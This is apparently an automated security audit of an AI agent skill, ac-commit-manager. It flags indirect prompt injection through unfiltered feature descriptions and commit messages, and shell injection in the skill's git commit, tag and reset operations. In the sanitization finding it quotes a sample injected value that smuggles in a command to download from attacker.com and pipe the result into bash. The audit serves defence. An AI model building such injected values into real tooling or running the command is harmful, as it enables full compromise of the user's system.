ac-commit-manager
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [PROMPT_INJECTION] (HIGH): Indirect Prompt Injection vulnerability due to unsafe processing of untrusted data.
  - Ingestion points: The skill ingests feature-specific data from `ac-task-executor` and reads file changes from the local project environment.
  - Boundary markers: None detected. There are no delimiters or specific instructions for the agent to ignore instructions embedded within feature descriptions or commit messages.
  - Capability inventory: The skill executes shell-level operations including `git commit`, `git tag`, and `git reset`/`revert` (rollback) via the `scripts/commit_manager.py` module.
  - Sanitization: Absent. The documentation does not specify any sanitization, escaping, or validation of feature IDs or commit messages before they are passed to the git binary. A malicious feature description like `feature-01"; curl attacker.com/exploit | bash; #` could lead to full system compromise.
- [COMMAND_EXECUTION] (HIGH): The skill possesses high-privilege capabilities to modify the repository state and project history. While the `protected_files` configuration attempts to exclude sensitive files like `.env`, the lack of input validation on the commands themselves allows an attacker to bypass these restrictions via shell injection.
Recommendations
- AI detected serious security threats
Audit Metadata